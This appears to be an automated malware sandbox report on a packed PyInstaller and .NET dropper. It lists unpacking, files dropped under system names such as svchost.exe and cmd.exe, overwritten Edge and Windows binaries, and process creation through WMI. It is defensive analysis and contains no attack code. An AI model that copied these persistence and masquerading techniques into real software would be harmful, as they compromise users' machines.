Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: iqA8j9yGcd.exe, 00000000.00000003.2012424329.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000002.2032036869.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmp, based.exe, 00000007.00000003.2039323205.0000020693470000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2817349912.00007FF8BA251000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: based.exe, based.exe, 00000008.00000002.2805425038.00007FF8A87D1000.00000040.00000001.01000000.00000018.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: hacn.exe, 00000006.00000003.2039565575.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2815402387.00007FF8B8B01000.00000040.00000001.01000000.00000019.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: based.exe, 00000008.00000002.2815771454.00007FF8B8B21000.00000040.00000001.01000000.00000017.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdb source: based.exe, 00000008.00000002.2813439502.00007FF8A9355000.00000040.00000001.01000000.0000001F.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python311.pdb source: based.exe, 00000008.00000002.2805857266.00007FF8A8CCB000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: based.exe, 00000008.00000002.2815095060.00007FF8B7E31000.00000040.00000001.01000000.0000001D.sdmp

Source: iqA8j9yGcd.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: iqA8j9yGcd.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: iqA8j9yGcd.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: iqA8j9yGcd.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: iqA8j9yGcd.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\ProgramData\setup.exe

Unpacked PE file: 20.2.setup.exe.11262380000.1.unpack

.NET source code contains potential unpacker

Source: main.exe.12.dr, AssemblyLoader.cs	.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
Source: Update.exe.14.dr, AssemblyLoader.cs	.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])

Yara detected Costura Assembly Loader

Source: Yara match	File source: 14.0.main.exe.25a8b2505b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.main.exe.25a8b0e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.main.exe.25a8b0eef04.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2273857665.0000025A8D351000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.2085852363.0000025A8B0E2000.00000002.00000001.01000000.0000001C.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2070913256.0000000006BB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\ProgramData\main.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED

Source: VCRUNTIME140.dll.0.dr

Static PE information: 0xC94BF788 [Wed Jan 6 22:49:44 2077 UTC]

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ut1ljh4b\ut1ljh4b.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sirtu5ev\sirtu5ev.cmdline"
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ntoifwit\ntoifwit.cmdline"
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ut1ljh4b\ut1ljh4b.cmdline"
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ntoifwit\ntoifwit.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sirtu5ev\sirtu5ev.cmdline"

Source: C:\ProgramData\Microsoft\based.exe

Code function: 8_2_00007FF8A87A6180 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

8_2_00007FF8A87A6180

Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe

File created: C:\ProgramData\Microsoft\__tmp_rar_sfx_access_check_5728640

Jump to behavior

Source: _sqlite3.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0x1281c
Source: sqlite3.dll.7.dr	Static PE information: real checksum: 0x0 should be: 0xa645f
Source: updater.exe.20.dr	Static PE information: real checksum: 0x55ddc3 should be: 0x56311d
Source: python311.dll.7.dr	Static PE information: real checksum: 0x0 should be: 0x1a7855
Source: libcrypto-3.dll.7.dr	Static PE information: real checksum: 0x0 should be: 0x195167
Source: svchost.exe.12.dr	Static PE information: real checksum: 0x0 should be: 0x3e6084
Source: unicodedata.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x579c6
Source: _queue.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0x1140a
Source: _socket.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0x1189d
Source: libcrypto-3.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x195167
Source: _ssl.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0x1559a
Source: main.exe.12.dr	Static PE information: real checksum: 0x0 should be: 0x5a77b9
Source: _lzma.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x24ab5
Source: s.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x9da692
Source: unicodedata.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0x579c6
Source: wxyubnjmnlae.tmp.20.dr	Static PE information: real checksum: 0x0 should be: 0x316d6
Source: _bz2.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x12c8a
Source: ChainComServermonitor.exe.13.dr	Static PE information: real checksum: 0x0 should be: 0x397a7b
Source: libffi-8.dll.7.dr	Static PE information: real checksum: 0x0 should be: 0xa1d1
Source: cmd.exe.33.dr	Static PE information: real checksum: 0x0 should be: 0x397a7b
Source: based.exe.5.dr	Static PE information: real checksum: 0x75debc should be: 0x75b3f8
Source: _socket.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x1189d
Source: Update.exe.14.dr	Static PE information: real checksum: 0x0 should be: 0x5a77b9
Source: _hashlib.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0xed42
Source: select.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0xd891
Source: _lzma.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0x24ab5
Source: libssl-3.dll.7.dr	Static PE information: real checksum: 0x0 should be: 0x4723f
Source: _hashlib.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0xed42
Source: setup.exe.12.dr	Static PE information: real checksum: 0x55ddc3 should be: 0x56311d
Source: select.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0xd891
Source: _bz2.pyd.7.dr	Static PE information: real checksum: 0x0 should be: 0x12c8a
Source: python311.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x1a7855

Source: Build.exe.0.dr	Static PE information: section name: .didat
Source: VCRUNTIME140.dll.0.dr	Static PE information: section name: _RDATA
Source: hacn.exe.5.dr	Static PE information: section name: _RDATA
Source: VCRUNTIME140.dll.6.dr	Static PE information: section name: _RDATA
Source: libcrypto-1_1.dll.6.dr	Static PE information: section name: .00cfg
Source: python310.dll.6.dr	Static PE information: section name: PyRuntim
Source: s.exe.6.dr	Static PE information: section name: .didat
Source: VCRUNTIME140.dll.7.dr	Static PE information: section name: _RDATA
Source: libffi-8.dll.7.dr	Static PE information: section name: UPX2
Source: setup.exe.12.dr	Static PE information: section name: .xdata
Source: svchost.exe.12.dr	Static PE information: section name: .didat
Source: updater.exe.20.dr	Static PE information: section name: .xdata

Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Code function: 5_2_0044125A push ecx; ret	5_2_0044126D
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Code function: 5_2_00441DB0 push ecx; ret	5_2_00441DC3
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6447D506C push rcx; iretd	6_2_00007FF6447D506D
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_0000020694EDACDD push rcx; retf 003Fh	7_2_0000020694EDACDE
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_000001F16E74ACDD push rcx; retf 003Fh	8_2_000001F16E74ACDE
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_000001F16E7BC6DD push rcx; retf 003Fh	8_2_000001F16E7BC6DE
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A8075CFE push rdx; ret	8_2_00007FF8A8075D01
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A8075D06 push r12; ret	8_2_00007FF8A8075D08
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A8078DA5 push rsp; retf	8_2_00007FF8A8078DA6
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A8075DF7 push r10; retf	8_2_00007FF8A8075DFA
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A8075E0F push rsp; ret	8_2_00007FF8A8075E17
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A8077630 push rbp; retf	8_2_00007FF8A8077649
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A8075E58 push rdi; iretd	8_2_00007FF8A8075E5A
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A807767B push r12; ret	8_2_00007FF8A80776BF
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A8075EAD push rsp; iretd	8_2_00007FF8A8075EAE
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A8075EBC push rsi; ret	8_2_00007FF8A8075EBD
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A80782C4 push rdi; iretd	8_2_00007FF8A80782C6
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A807930D push rsp; ret	8_2_00007FF8A807930E
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A8075EFA push r12; ret	8_2_00007FF8A8075F07
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A8078F28 push rsp; iretq	8_2_00007FF8A8078F29
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A8075F56 push r12; ret	8_2_00007FF8A8075F6E
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A8077F53 push rbp; iretq	8_2_00007FF8A8077F54
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A8075F76 push r8; ret	8_2_00007FF8A8075F83
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A8075FB9 push r10; ret	8_2_00007FF8A8075FCC
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A8077FEB push r12; ret	8_2_00007FF8A8078036
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A8078405 push r10; retf	8_2_00007FF8A8078471
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A8075C31 push r10; ret	8_2_00007FF8A8075C33
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A8078077 push r12; iretd	8_2_00007FF8A807808B
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A807685F push rsi; ret	8_2_00007FF8A8076896
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A8075CE5 push r8; ret	8_2_00007FF8A8075CEB
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF8A8075CE0 push r10; retf	8_2_00007FF8A8075CE2

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Drops PE files with benign system names

Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe

File created: C:\ProgramData\svchost.exe

Jump to dropped file

Drops executables to the windows directory (C:\Windows) and starts them

Source: unknown

Executable created and started: C:\Windows\Logs\SettingSync\cmd.exe

Found pyInstaller with non standard icon

Source: C:\Users\user\Desktop\iqA8j9yGcd.exe

Process created: "C:\Users\user\Desktop\iqA8j9yGcd.exe"

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75002\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI73082\libcrypto-3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\jXYEVzlL.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75162\libcrypto-3.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75002\_decimal.pyd	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\sirtu5ev\sirtu5ev.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\OaRiuQGD.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75162\sqlite3.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Jump to dropped file
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI73082\python311.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75162\select.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75162\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\qVMExOgA.log	Jump to dropped file
Source: C:\ProgramData\main.exe	File created: C:\Users\user\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\QXsqPQUy.log	Jump to dropped file
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI73082\_bz2.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75162\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\3D Objects\tasklist.exe	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75162\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI73082\_hashlib.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75162\_decimal.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75002\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	File created: C:\ProgramData\svchost.exe	Jump to dropped file
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI73082\select.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75162\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI73082\unicodedata.pyd	Jump to dropped file
Source: C:\ProgramData\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\NMiIKuxG.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\NedIeTjA.log	Jump to dropped file
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI73082\_decimal.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75162\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI73082\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	File created: C:\ProgramData\Microsoft\based.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\texuZkSn.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\SQHZBNGw.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75162\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\cAOXqsEV.log	Jump to dropped file
Source: C:\ProgramData\main.exe	File created: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75002\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75162\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	File created: C:\ProgramData\setup.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\IibrXntG.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\CyikYrPX.log	Jump to dropped file
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI73082\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Windows\Logs\SettingSync\cmd.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\gngVTpTJ.log	Jump to dropped file
Source: C:\ProgramData\setup.exe	File created: C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmp	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75002\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\etdFcppU.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Program Files (x86)\Windows Photo Viewer\en-GB\biuvCXdylsCxguP.exe	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75162\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\bRVpFOxY.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75002\libcrypto-1_1.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75002\python310.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	File created: C:\ProgramData\main.exe	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75162\libssl-3.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75162\_sqlite3.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75002\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\qejEhBzx.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75162\python311.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\NvkaspdC.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	File created: C:\ProgramData\Microsoft\hacn.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\uLCuFLgt.log	Jump to dropped file
Source: C:\ProgramData\setup.exe	File created: C:\Program Files\Google\Chrome\updater.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\DhbSKVVV.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75162\libffi-8.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\bIypVceb.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\FjOAgEaQ.log	Jump to dropped file
